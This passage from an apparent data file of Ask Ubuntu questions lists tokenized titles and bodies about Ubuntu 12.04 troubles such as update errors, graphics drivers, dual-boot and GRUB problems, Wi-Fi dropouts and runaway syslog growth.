monitor . i 'm looking for a way to get into a recovery mode.i 'd really like to avoid wiping the drive . any thoughts ?
184771	error while updating ubuntu 12.04 using update manager	i have ubuntu 12.04 installed in a sony vaio vpceh38fn . i have internet connection through a proxy server . the update manager has suddenly stopped working . it gives me the following error , when i try to update , and then doesnt do anything else . what exactly is this error , and what should i do . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_talkplugin_deb_dists_stable_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' any help is highly appreciated . i havent been able to update my system since a couple of weeks . after trying : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update i got some details etc back in the terminal . e.g . after the first command : rm : can not remove /var/lib/apt/lists/partial : is a directory removed /var/lib/apt/lists/private-ppa.launchpad.net_commercial-ppa-uploaders_tiberiuma‌​lliances_ubuntu_dists_precise_main_binary-i386_packages . after the second command , it did something , and completed its 100 % . sorry , for my ignorance , but i am new to ubuntu . after that i again tried to update with the update manager . it is still not being able to update , below shows the error i got , or has my os been updated ? w : failed to fetch extras.ubuntu.com/ubuntu/dists/precise/main/source/sources 403 forbidden [ ip : 10.93.0.36 3128 ] , w : failed to fetch extras.ubuntu.com/ubuntu/dists/precise/main/binary-i386/… 403 forbidden [ ip : 10.93.0.36 3128 ] , w : failed to fetch security.ubuntu.com/ubuntu/dists/precise-security/main/source/… 403 forbidden [ ip : 10.93.0.38 3128 ] , w : failed to fetch security.ubuntu.com/ubuntu/dists/precise-security/restricted/… 403 forbidden [ ip : ... ..
184791	how to disable non-ssl connection on apache 2.2	i am using apache 2.2 on 12.04 . i have activated ssl connection with a self-signed certificate which works fine , but now i 'd like to disable any non-ssl connection . i used a2dissite default but the server is still accessible on port 80 even after restarting the server . please help me on this .
184792	is there any cli utility that can convert program written in c to java ?	is there any ubuntu program that converts the program written in c to java . i know there 's an utility that can convert awk script to perl script ( a2p ) .
184794	win7 on virtualbox and full screen mode	i 've installed win7 on virtualbox on ubuntu 12.04 . however , the full screen mode is n't perfect . i have black parts on both sides of the screen . i tried changing the resolution but nothing fits . anyway to fix this ? by the way , my ubuntu is 64-bit ( intel 4000 graphic card ) , and the my win7 is 32-bit . i 'm not sure if this is the cause of the issue .
184795	how to monitor laptop temperature ?	after installing lm-sensors and runing sudo sensors-detect i got the message : sorry , no sensors were detected . this is relatively common on laptops , where thermal management is handled by acpi rather than the os . what is to be done in this case ? ( how to access acpi ? ) i 'm in lubuntu 12.04 on a hp compaq laptop
184797	.override file is n't working	i have a file /etc/init/boinc-client.override with the single line manual that i use to prevent the boinc client from starting up . ( i do n't want it hogging cpu time away from folding @ home , for now anyway . ) but , after restarting , i noticed that boinc had started itself up again . i am sure that , i have upstart installed . what should i do ?
184798	update manager unable to get update	when i try to get updates , update manager shows that message
184799	ubuntu in vmware alt-key issues	i 've just installed ubuntu 12.04 on my macbook ( 4.1 ) running lion . i have chosen the swedish ( macintosh ) keyboard layout and it 's working pretty good . ⌘ + c , ⌘ + a etc . are all working as in osx . the alt is not working as i want though . how can i make it function just as in osx ? so , alt + 7 = > | etc . right now nothing happens ( brings up dashboard menu when alt is clicked ) . i 'm very new to ubuntu and i have tried to change the options in the keyboard layout settings but i ca n't find the correct settings . even tried with xmodmap , but still no luck . any ideas ?
184801	bluetooth - no device	i 've got a packard bell easynote ml65 with a integrated bluetooth device . well , after i installed ubuntu 12.04 it says : `` no bluetooth-device found '' . lspci and lsusb do n't show a device . thank you for your help
184805	create a shortcut under `` computer '' in home folder ubuntu 12.04	is there a simple way of creating a `` shortcut '' to a folder in the home folder under `` computer '' ( ubuntu 12.04 ) ? please see the following screenshot . i will clearly explain the issue . what i need is to have a `` shortcut '' to the folder `` cisco '' . this `` shortcut '' should be displayed in the left side column ( where the red arrow points ) under the other `` shortcuts '' ( home , desktop , documents , ... ) how do you create a `` shortcut '' to this `` cisco '' folder , `` shortcut '' located under `` computer '' . seems like an easy task ... but i could not figure out how to do that ? ? thank you so much for your help .
184807	how to share folders and how to mount flash drives on mac os x virtual machine using virtualbox	i have searched literally the whole internet.i found pretty much ... .. nothing ! the problem with details : virtualbox installed on ubuntu 12.04 . i created a virtual machine to run mac os x lion . i downloaded the virtualbox-addition-guest.iso and now it is located in /usr/share/virtualbox folder.i managed to use it on backtrack 5 r3.so there is no question/doubt about the functionality of the .iso . 1 ) i am trying to mount a sandisk flash drive 8 gb ( fat 32 ) on the guest machine on virtualbox , which is the mac os x lion.i installed the virtualbox extension pack and the i chose the mac os x and i opened the settings of the virtual machine.after going to the usb tab on the left i checked the usb controller option and i pressed add filter from device ( it 's the little icon on the right which illustrates a usb and a green cross ) .after pressing that it ways that there are no devices to add. ( why ? ? ? ? ? ? ) i did also the same thing with the usb 2.0 ( ehci ) controller , but guess what ... ..still the same with the aforementioned ! 2 ) i am trying to share a folder from ubuntu to mac os x.again i went to settings and i chose the shared tabs on the left.i added a folder , i checked auto-mount and i left unchecked the read-only option , but again i ca n't see it when i run mac os x. i had an idea to add to the shared folders the /media folder in order mac os x to see the usb flash drive , but still nothing . the only thing that i have succeed in is that i have exceed my frustration limits . so , is there a way to solve these issues ?
184810	your system is running in low graphics mode with an ati radeon x550	after yesterday automatic update of ubuntu 12.04.01 at the first boot i get the message `` your system is running in low graphics mode '' and i can not start my desktop normally . the update was mainly for the xorg ( ~100 mb ) so i guess the problem is there . the only way i 'm able to use my ubuntu now is after i executed the command '' sudo cp xorg.conf.failsafe xorg.conf '' the side effect is that unity starts with the 2d version and i 'm not able to get the 3d version back . the ati driver for this graphic card are no longer available so only the open ones can be used . thanks in advance for any help .
184811	why wo n't the amd catalyst control center open ?	when i try to launch it i get an error which mentions two reasons that might have caused this problem . either there 's no amd graphics driver installed ( i did install it , just not the post-release updates because they never do install . ) , or the driver 's just not functioning properly . i only installed ubuntu 12.04 not long ago so i 'm not completely familiar with this os yet . what do i do ?
184815	how to view windows desktops over network ?	i would like to view a remote windows desktop and also control the action/clicks , start applications , etc , from my ubuntu desktop . can this be done ? if yes , is there any easy to use tool for this ? note : one remote machine is running windows 7 , and other is on windows 8 . my machine is running ubuntu 12.04 .
184821	what is the meaning of `acpi_osc request failed` ?	when i run gksudo xdiagnose and click on view error button , it shows me this error : pci0000:00 : acpi_osc request failed ( ae_error ) , returned control mask : 0x1d what is the meaning of this error ? just to mention that i have some problems with my monitor backlight . thanx a lot ; )
184822	launcher bar in purple and only has icons for dash , trash , and workspaces ; keyboard unresponsive , and menu bar empty	please help me reset or reinstall unity . i 've already tried everything here as well as apt-get update and upgrade . my system entered this state after i re-installed the os ( 12.04 ) in the hopes of curing its instability . the curious thing is that unity works if i go through recovery mode followed by resume .
184825	can i remove the os x partition from a dual-boot macbook pro ?	i am wondering if you can remove the mac os x partition to give the whole hdd to ubuntu . will it stop my computer from booting up ? or will it work flawlessly ?
184834	can i remove the ctrl+w shortcut in nautilus ?	i 'm looking for some way to unplug the ctrl+w shortcut in nautilus that closes the window . the reason is that when i drag a file out of nautilus into my text editor , i almost always close it after reading some snippet for about 3 seconds . but when i press ctrl+w to close my file , nautilus wants to be the application in focus , so it takes the keystroke and closes the nautilus window . it would actually be better for nautilus to release focus to the drop target when a file is dragged out -- or even better , never take focus at all , just be visible but not a focusable window . but this seems like it would be difficult to accomplish , so i 'd be happy with a way to turn off ctrl+w . does anyone know of a way ?
184835	is it possible to have windows 7 installer files and ubuntu installer files on the same bootable usb drive ?	i would like to know whether it is possible to have windows 7 installer files and ubuntu 12.04 installer files on the same bootable usb drive so that if i choose to boot a pc with such a usb drive , i will get the option to install either windows 7 or ubuntu 12.04 on it . perhaps a usb drive can have two bootable partitions , one with windows 7 setup files while the other can have ubuntu 12.04 's setup files . on booting with such a drive , one gets a boot screen which lets you install either of the two or both at different times . is such an arrangement possible ? can this be done ? please let me know .
184840	why does the ubuntu software center deliver an outdated version of tex live ?	starting from a fresh install of ubuntu 12.04.1 in late august , i have used the ubuntu software center to install the so-called `` decent selection '' of tex live and also some additional tex live packages . to my astonishment i have now realized that ( at least some of ) the tex live packages are outdated ! the ubuntu software center states the version of the tex live distribution to be `` texlive 2009-15 '' . an example of an outdated file is fontspace.sty , on my system that file is dated 2008-08-09 but i have been informed that there is e.g . a version dated 2011-02-26 ( see answer given to the question problem with xetex ( latex ) and system fonts at http : //tex.stackexchange.com ) . two questions : why does the ubuntu software center deliver an outdated version of the tex live distribution ? how to update the tex live distribution to the latest and greatest version ?
184841	how can unity-panel-service be disabled ?	from the unity-panel-service manpages : description the unity-panel-service program is normally started automatically by the unity shell ( which gets started as a compiz module ) and is used to draw panels which can then be used for the global menu , or to hold indicators . how can the unity-panel-service be non-automatically started abnormally ? in other words , how is it arbitrarily manually started and/or stopped ? the manpage implication is that this can be done without stopping the unity shell . this answer seems promising : is it possible to restart the unity panel without restarting compiz ? but ... not . the process can be killed from system monitor but it restarts automatically . references : how can menu bars that require a right click be activated like ubuntu versions < 10.10 ? how do i disable the global application menu ?
184851	bookmarks in nautilus only in menu , not in the shortcut tab	bookmarks added to nautilus using ctrl + d do not appear under `` bookmarks '' in the nautilus windows -- but they can well be seen in the bookmarks menu entry : i tried to restart nautilus and log out / log in , but the problem persists . is this a bug , or a feature ?
184855	why wo n't qt-sdk install ?	i just installed ubuntu 12.04 . one of my classes require that i install the qt libraries and sdk , however , i can neither install the 32-bit or 64 bit version . i changed both into executable files , but ubuntu refuses to even run the 32-bit setup . when i run the 64-bit setup , it will work until it asks me to choose a directory . after i click next the setup will slowly disappear and the computer becomes incredibly slow . when i click the icon for the qt setup , the workspace switcher comes up , but no window .
184860	kvm guest disk performance	my kvm guest does max . 200mb/s although the host does easily > 700mb/s ( raid 0 with 4 ssds ) . configuration : file-based storage ( raw ) , cache none . host 24 cores , 96gb ram , ubuntu 12.04.1 lts and virt-manager . i suspect the cpu to be the bottleneck ( one core goes up during hdparm ) . anyone experienced the same or has an explanation ? edit : one more info : guest is the same as host ( ubuntu 12 ) . same poor disk performance observed with windows 2008 r2 and suse enterprise linux ( 9 or 10 i think ) . max 1 guest running .
184870	12.04 disabling wireless via dbus does not work	i am using a proprietary rt3652sta driver for my wireless card . it appears as a ra0 device on the 64-bit ubuntu 12.04 . according to the online documentation the following used to work definitely up to 10.04. dbus-send -- system -- type=method_call -- dest=org.freedesktop.networkmanager /org/freedesktop/networkmanager org.freedesktop.dbus.properties.set string : org.freedesktop.networkmanager string : wirelessenabled variant : boolean : false this however has no effect on the aforesaid wireless card in 12.04 . also , rfkill does not work as it does not even list the wireless button ( again , likely due to the wireless driver being proprietary ) : rfkill list it only lists the hci0 ( bluetooth ) one and one can block/unblock it accordingly but this has no effect on the wifi . ifup/down also does not work ( afaict ) ... and this leaves me with disabling wireless through the network manager applet . however , trying to do so via dbus appears not to work and yet i would like to automate it via a script . any ideas how i could find out the proper dbus structure for the call ? is this even possible in ubuntu 12.04 ?
184872	disabling x to install graphics nvidia graphics card drivers	i 'm trying to install my nvidia geforce 555m graphics card drivers but when i run the .run file it tells me to disable all x server windows . i googled a bit but did n't find answers . i 'm running unity by the way thanks in advance .
184873	is there any possible ( and simple ) way to delete my windows partitions and extend my ubuntu partitions ?	i want to know is there any possible ( and simple ) way to delete my windows partitions and extend my ubuntu partitions . i have 1 hdd 700 gb : sda1 primary 100mb ntfs ( windows boot partition ) sda2 primary 100gb ntfs ( windows 7 os ) sda3 primary 500gb ntfs ( windows data files ) sda4 extended partition 98gb : sda6 ext4 94gb ( ubuntu 12.04 ) sda5 swap 4gb my actual boot partition is sda1 i want do delete windows partitions and extend my ubuntu installation to the whole hdd , maybe creating only /home and /boot partition additional , so i have : sda1 /boot partition ( 500mb ) sda2 / partition ( 200gb ) sda3 /home partition ( 489,5gb ) sda4 swap ( 10gb ) is there any way to do it without reinstall whole system ?
184875	how to make a set of screenshots automatically ?	i would like to do an animated gif file . thus i need all images and then i can build the gif file with gimp or convert . but in order to obtain the images how can i do a set of successive screenshots ? what i would like to record is a vibration movement of a molecule or a crystal ( using jmol or j-ice ) . actually , i want to do a screencast ...
184878	how can i edit a .conf file owned by root ?	i 'm trying to create an exception file to disable my ethernet as i think it 's responsible for my 350s+ boot times , please see section of dmasg below : - [ 3.750961 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 364.079424 ] addrconf ( netdev_up ) : eth0 : link is not ready i 'm following this answer disable ethernet permanently to speed up boot time and i 've created the file but i ca n't save the edited version , the permissions tab tells me it 's owned by root . any help is most appreciated . i 'm a proper linux newbie , trying to get it to work on this laptop is my first foray into ubuntu . i read messing with the root 'account ' is not something for people who do n't know what they 're doing ( i.e . me ! ) . please be gentle : - )
184882	can i theme the menubar to look different if a window is maximized ?	i know you can theme the unity menubar in gtk+3 using css , but is there a way to theme it differently depending on whether a window is maximized ? this would be useful for e.g . themes where the menubar should appear standalone in the absence of a maximized window , but then seamlessly blend into the top of such a window when there is one . preferably , i would like to be able to do this from within the theme files .
184885	problem with nvidia g86 on kubuntu 12.04	i got problems some weeks ago with my nvidia g86 ( 8500 gt ) , supposedly due to the infamous 295.40 version of the driver . i got errror messges like nvrm : rminitadpterfailed . tried varous sugestions about setting kernel acpi and memory options , but no luck . i pulled in x-swat and got 302.17 , if i remember correctly . it did not help . people recommended xorg-edgers , so i pulled that in and got kernel 3.5.0.12 and nvidia 304.43 but the problem remained . getting slightly panicked , i tried to back back to vanilla 12.04 , so i purged nvidia* and located and removed anything on the system that smelled nvidia . i installed nouveau , cause people said it was great , but as it turns out , my card does not seem to be supported . sigh ... so now i fear that i have atmessed up system , and graphics is terrible . any help would be appreciated . xorg.0.log : http : //paste.ubuntu.com/1189616/ kern.log : http : //paste.ubuntu.com/1189634/
184886	international keyboard -layouts over x -- how to set them up ?	i have asked a related question in different sites such as here in german and a related thread here , a different case in the latter though . the # dpkg-reconfigure console-setup is firing warning : unknown x keysym `` dead_belowcomma '' , some bug ? i almost solved the question here , basically : `` /etc/default/keyboard '' -modification and one-line `` $ setxkbmap -option grp : caps_toggle -variant dvorak-intl , nodeadkeys , us , de , no & '' -- but the layout-settings get reseted after reboot . i use debian but i believe the same settings apply to ubuntu hence asking here . helper questions so how can i get settings to stay after rebooting ? or # service gdm3 restart ? or better how can i configure international keyboard -layouts system wide ? what about user-centric keyboard -configuration ?
184887	multiple problems installing 12.04 , now ca n't use windows	first i tried using the 32-bit wubi.exe installer from the main ubuntu website . it worked fine , dual booted with windows 7 and all . i tried installing several applications and got errors . after searching for a little while for a fix , i found that someone else had solved the problem by uninstalling the 32-bit version and installing 64-bit ubuntu . apparently there is no wubi.exe installer for the 64-bit version , so i used linuxlive to put the iso file onto a usb drive . i changed my the boot order in bios to check the usb first . it did , and i got into the ubuntu installer just fine . everything was working fine , but then i got an error that grub could not be installed . i chose `` install manually later '' or something like that . immediately , the installer said it was done and ready for a reboot . at this point , my usb is still in the computer . the computer reboots ... and it 's back at the installer for the usb . i look up what 's going on here , and someone says in a thread they solved it by selecting `` try ubuntu '' then installing it via a shortcut on the desktop . i assumed that ubuntu simply had n't installed and it would be safe to try again , so i did . it finished installing , this time i chose a different partition that was n't being used . the thread also said to reinstall grub to the mounted drive , so i did that . next i took out my usb and rebooted . i get stuck on the grub gnu loader , v.1.99 or something i believe it says at the top . i ca n't do anything , and it does n't detect windows 7 or ubuntu . when i check partitions , i have two 43 gb partitions that both have the same files in them ( i 'm assuming those are the two ubuntu installations ) , and can only run ubuntu off of my usb -- and ca n't run windows 7 at all , however from within ubuntu the windows 7 filesystem and files can still be seen . i have no idea what to do now . i used ubuntu in the past ( 9.xx ) and never had these sorts of problems ! please help . and sorry for the wall of text .
184889	windows 7 and ubuntu 12.04 dualboot	i have windows 7 on a partition of my harddisk and ubuntu 12.04 on a partition of a external hdd . dual boot is working fine . both systems are working fine . can i boot with my external hdd with my ubuntu ? ( ex : on another pc ? ) when i try to boot from the external hdd is not working ? the only way i can boot ubuntu is from the normal boot menu choosing a option . thanks
184890	two failed md5 hashes	i downloaded ubuntu 12.04 lts and the md5 showed 06472ddf11382c8da1f32e9487435c3d but on the source page hash shows 9fcc322536575dda5879c279f0b142d7 ubuntu-12.04-alternate-amd64.iso why is this mismatch ?
184893	how to download video from arte+7 and arte-tv related sites ?	arte tv has a website called arte+7 where some videos are provided for a period of time . but these are not as easy to download as those on youtube and other such websites . is there a program that can do that ?
184899	i am looking for app to remove exif tags	i am looking for application not to viewing , but to removing exif tags from photos . i know , that i can do it by opening file in text editor , but i hope that there is nice app for this . can somebody give me a name ( i spend some time on searching ) .
184901	headset undetected when plugged in	i have recently installed ubuntu 12.04 in my machine which was running windows 7 . i have been trying to configure the audio to work exactly as it used to work in windows but never been able to do so . i have followed this link exactly . i am still not getting the required configuration . aslamixer command shows me with 5 adjustable controls as shown below master `` adjustable '' speaker `` adjustable '' pcm `` adjustable '' front `` adjustable '' and beep `` adjustable '' mic jack mic in or lin in s/pdif oo `` in a box '' s/pdif d oo `` in a box '' s/pdif p digital or analog m it does not detect the headset jack when plugged in . i here mean to say that the sound form the speakers does not go off when i plug in my headset jack . how can i make this working . some other googling also did not help . i am on hp pavilion dv7 machine . the chip is idt 92hd75b3x5 and the card is hda ati sb . edit : apaly -l gives the following output , i do have the inbuilt mic . **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : stac92xx digital [ stac92xx digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 > subdevice # 0 : subdevice # 0
184902	display port on x230 not working	having problems with my new lenovo x230 - using dual montiors , only vga registers anything . this has the intel graphics controller : 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) to get it to even boot , had to add the nomodeset parameter to the kernel . otherwise will not even start up x ive upgraded my kernel to the latest 3.6 with no difference . the display section reads the monitor as the only display and labels it as laptop . cant seem to get it to work ! any help would be greatly appreciated .
184903	starcraft 2 not displaying map in game	i installed starcraft ii wings of liberty via playonlinux , it installed fine , it starts up fine , but when i go into a game the map does not show , it is just black , but all my buildings/units/mineral line shows up , but everything else is black , also all the abilities do not have any graphics , and i can not see my player portrait in the menus . i am on a 32 bit version of ubuntu 12.04 with wine 1.5.10 i think it is probably a missing package i need to install ... but i have no clue which one it would be , or if it is even that . can anyone help ? thank you in advance !
184907	ca n't login to unity 3d after enabling xinerama for a short moment	today i connected a second monitor to my computer . i set it up using nvidia 's control panel , and all was working quite well , so i figured it wo n't be a problem to try xinerama , just to see the difference between that and twinview . after enabling xinerama and restarting the x session , i saw that i was logged into a unity 2d session . i thought it was a problem with xinerama , so i switched back to twinview , but it still logged me into unity 2d . i tried disconnecting the second monitor , no luck : still unity 2d . i tried changing gpu drivers and installing drivers from a separate ppa , and still i was logged into unity 2d . up until this point , i did n't have any problem logging into unity 3d . it only happened after i tried using xinerama . i should note that i was doing all this while updates were going on in the background , so it could be something related to that , though i ca n't imagine what ( i tried booting with another kernel , but no luck ) . so what exactly happened ? did changing the mode to xinerama triggered some other changes that i 'm not aware of ? did these updates cause a certain malfunction in the driver ? is it something else ?
184908	helvetica neue font defaults to medium instead of regular	i 've installed the set of helvetica neue truetype fonts in my ~/.fonts directory , and they all show up correctly with fc-list . however , if an application selects the standard font , it 's returning the medium style instead of the regular , e.g . : $ fc-match `` helvetica neue '' helveticaneuemedium.ttf : `` helvetica neue '' `` 中黑 '' if i remove the medium font from the system , it gets the correct one : $ fc-match `` helvetica neue '' helveticaneue.ttf : `` helvetica neue '' `` 標準體 '' i 'm sure this can be corrected in fonts.conf , but what 's the entry required ? the only workaround i have right now is to remove the medium style as above , but this means i ca n't access it at all .
184909	dual screen with 12.04 ati randr extension is not present	here 's my problem i have two screens . one is a 22 '' led monitor and the other is 42 inch led tv . in windows 7 i run xbmc on the second monitor . i 'm trying to mimic the same function in setting xbmc to display on the tv only . so i installed the latest x64 linux drivers from ati . i configured ( using the catalyst control panel ) using single display ( multi desktop ) i then got a white screen with black x so i enable xinerama . with xinerama enable i got the displays to work correctly , however i received an error when i tried to enter display settings to change the launcher location . the error message was `` `` randr extension not present = '' so i tried to install libxandr2 using terimal but here 's what i get trev @ lrig : ~ $ sudo get-apt install libxander2 [ sudo ] password for trev : sudo : get-apt : command not found i 'm at a loss now because i ca n't find a solution for the xandr error message . i'f my specs are important amd athx2 6400+ ghz 8 gigs ram radeon hd6950
184911	why is the gnome 3 lock screen not displaying ?	i installed gnome 3 recently and was expecting the new lock screen , but when i lock the screen i 'm displayed with the 'old ' version : how do i get the lock screen to appear like the one displayed in the article ?
184917	how to create a user for ftp server ?	i 'm using vsftpd . i need an ftp server for my web server , i can login under my account of course , but i ca n't do the main thing it 's meant for and add/edit/remove files in my var/www directory . could someone walk me through the process in creating a new user for just ftp , and allow it to edit anything in that folder ? or is there an easier way to edit that with another account ?
184921	opening new file in new card - okular	i am sure that okular has a following feature : when i have already opened some .pdf file in okular and then i will double-click on the another different .pdf file , okular will open the second file in card , like a browser opens new page , instead of starting new okular . i just ca n't find how to enable that feature . thanks for any help and i aplogize for my english if i made any mistakes . anyway i hope you will know what i meant .
184928	how to deal with long-range , unreliable wifi access , featuring frequent dropouts	i just set up my router . reception is good throughout the house , with the exception of the computer with wireless dongle ( an android phone and a laptop with a bilt-in wireless card connect terrificly ) . dropouts are random , often and common ( i stay conencted from 1 second to 10 minutes with the 1 second case the most common ) . when there are no other devices on the network , or when my neighbours have turned off their wireless routers , dropouts are infrequent . i guess i have to set longer timeout and lower signal strength treshold , but do not know how to do that . how shall i proceed to set up a , maybe slow , but reliable conenction ? here are excerts from some commands outputs . os : ubuntu 10.04 x86_32 usb dongle : says just `` tp-link '' , is pretty tiny router : wired-wireless tp-link router , rated wireless speed 150nbps distance : 2 rooms i.e . 2 walls , 15 meters ifconfig : wlan0 link encap : ethernet hwaddr 54 : e6 : fc:8f : d4:73 inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :56e6 : fcff : fe8f : d473/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:446 errors:0 dropped:481 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:144937 ( 144.9 kb ) tx bytes:0 ( 0.0 b ) iwconfig : wlan0 802.11b/g/n li essid : '' wifi '' mode : managed frequency=2.427 ghz access point : 54 : e6 : fc : bc:50 : fe bit rate=300 mb/s retry min limit:7 rts thr : off fragment thr : off power management : off link quality=65/100 signal level=-71 dbm noise level=-102 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 dmesg : [ 2245.471876 ] ieee80211 : failed to reply on addba_req as some capability is not ready ( 0 , 1 ) [ 2245.471886 ] ===== > to send addbarsp route : kernel ip routing table destination gateway genmask flags metric ref use iface 192.168.1.0 * 255.255.255.0 u 2 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 wlan0 default 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 network manager conects at 2/3 signal power . iwlist power : wlan0 supported modes : o receive all packets ( unicast & multicast ) o receive unicast only ( discard multicast ) o receive multicast only ( discard unicast ) fixed period ; min period:0us max period:5s fixed timeout ; min timeout:0us max timeout:65.535s current mode : off iwlist rate : wlan0 12 available bit-rates : 1 mb/s 2 mb/s 5.5 mb/s 11 mb/s 6 mb/s 9 mb/s 12 mb/s 18 mb/s 24 mb/s 36 mb/s 48 mb/s 54 mb/s current bit rate=300 mb/s
184938	how can i remove a link to a page from the gnome launcher ?	i accidentally dragged a link to the top-right of my screen in gnome classic ( no effects ) in ubuntu 12.04 . i right-clicked on the link to remove it but there was no option to get rid of it . how can i get rid of the link ? it 's the little globe icon next to the bulb icon .
184940	hard time installing ubuntu	i have a msi gt780dxr that currently is booting windows 7 . i 've been trying to dual boot windows 7 and ubuntu for some time now . here 's specs that i think would make a difference windows 7 500gb*2 raid 0 hard drives . ( hardware raid i 'm not sure if it 's a dedicated raid card though ) 7200rpm nvidia gt570m background : i tried to install 12.04 ( 64 bit ) a few times but the desktop live cd and pendrive boots with a black screen . i 've tried wubi but it boots to a black screen as well . i then tried the alternative 12.04 ( 64 bit ) and went through the installation all the way til partitioning . i let ubuntu notice the raid setup and i setup my swap , / , and home drives , i used my free space to create the three partitions . i tried to resize the windows drive and it told me i could n't and to be happy with my current setup . when i finally got past i got an error on installing grub 2 and decided to skip it and continued on to finish installation . when i tried to boot up i got an invalid partition table error . windows recovery disc , and a gparted live cd could n't find any hard drives . i ended up following advice and typed this into the recovery command prompt . bootrec /fixmbr bootrec /fixboot bootrec /rebuildbcd it worked and here i am now . the question is , how would i be able to dual boot windows 7 and ubuntu 12.04 with this information ? thanks ,
184941	suddenly my display turns grey !	when i 'm working suddenly the mouse does n't respond and the display turns gray or black . although i can press any key ( i ca n't see what i 'm doing ) nothing happens at all ! ! . the only way to recover my pc is to turn it off . it has happened twice now and i 've lost lots of work . this has started right after i upgraded drivers for my video hardware ati . any suggestions ?
184943	can an apt proxy affect the use of dpkg ?	i have been doing ubuntu deployment using a preseed.cfg . after becoming comfortable with the packages being installed it was time to reduce download time and internet traffic by creating a mirror . i ended up doing a `` partial mirror '' using apt-cacher-ng and preseeding it by adding d-i mirror/http/proxy string http : //mymirror to the preseed.cfg . this is where things got strange . i have a few .debs that i run as part of preseed/late_command by wgetting them and installing them with dpkg -i . the packages were installing without issue until added the proxy . with the proxy they fail to install . so does the proxy affect installing .debs during preseeded installation ?
184946	gpg symmetric decryption reduce the passphrase remember time	i used this command to decrypt my file gpg -d myfile.gpg it asked me for passphrase when i entered it showed me the content of the file now when i run the command again it did not ask me the passphrase and directly decrypted the file how can i reduce the passphrase remember time . thanks is there any way to do this through command line or every from a software .
184949	how do i limit the size of my syslog ?	i 've got my mom 's computer running ubuntu 12.04 lts . it 's been working just fine but all of the sudden syslog has been filling up . and by filling up i mean i just deleted a /var/log/syslog that was 400gb in size . yes - gigabytes . while i 'm sure there was some useful information in there , i 'm not sure that 400gb is any kind of information to sift through . and what 's really amazing about it is that it happened within a period of 8 hours - i had ran df around noon , and between then and now her drive filled up 30 % ( from just under 70 % to 100 % ) . what could be causing this and how could i fix it ? ` edit looks like the usb is the offender : sep 8 08:52:10 pamela-desktop kernel : [ 6198.157829 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157836 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157842 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157849 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157857 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157863 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157870 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157877 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157884 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use sep 8 08:52:10 pamela-desktop kernel : [ 6198.157891 ] usb 1-3 : usbfs : process 1500 ( demond_nscan ) did not claim interface 3 before use
184950	what is ubuntu gnome remix ?	is it a software , new distro or an addition to ubuntu ? how can i download it and install it .
184955	special keyboard keys ?	i have a new laptop , it has the icon for toggling the touchpad on fn+f1 so i would like to assign this shortcut , i have a working script , and i can assign the script to any other combination , but it appears that ubuntu does not pick up the fn+f1 combination ? how can i correct this ? the other one is , my laptop has three extra buttons , assist , web , and vaio . these map to help , homepage , and nothing respectively . the web button is working perfectly . the assist button if i am setting up a keyboard shortcut for something it binds fine , but then pressing it does nothing ? the vaio button seems to not be listened to much like the combination i posted above . how can i correct the assist and vaio buttons ?
184957	how to fix : ubuntu 12.04 reboots after loading with elilo	i have an hp p6-2120 with cpu : amd a6-3620 apu with radeon graphics ram : 6gb bios : ho2_710.rom v7.10 [ ami v7.10 4/19/2012 ] disk : sata1 ( /dev/sda ) - 1 tb ( windows ) disk : sata2 ( /dev/sdb ) - 1 tb partitioned using `` parted -a optimal /dev/sdb '' as follows : .. 1049kb 201mb fat32 boot flag set .. 201mb 60gb ext2 ( / ) .. 68gb 78gb linux-swap ( v1 ) ( swap ) .. 78gb 790gb ext4 ( /home ) .. - rest is `` free '' space reserved for other purposes ( eventually ) ubuntu : 12.04.1 lts [ specifically : release 12.04 ( precise ) 64-bit ] kernel : linux 3.2.0-29-generic i created a bootable efi usb from the iso ( 64-bit ) which i downloaded . i can run and install from the usb without any problems . the bios is an efi bios that appears to be capable of booting in either efi or legacy mode . initially , i did the `` standard '' install with nothing on disk2 , and let the installer configure everything . the net result of this was that when i started the computer and forced it into `` boot '' menu mode , it does not recognize sata2 as an efi drive , and when i attempt to `` legacy '' boot from it , i get the message `` error : no boot disk has been detected . '' the `` standard '' install created one large partition that consumed the entire disk . at that point , i manually partitioned the disk ( using sudo parted -a optimal /dev/sdb ) as described above . i selected the `` other '' install , and changed the 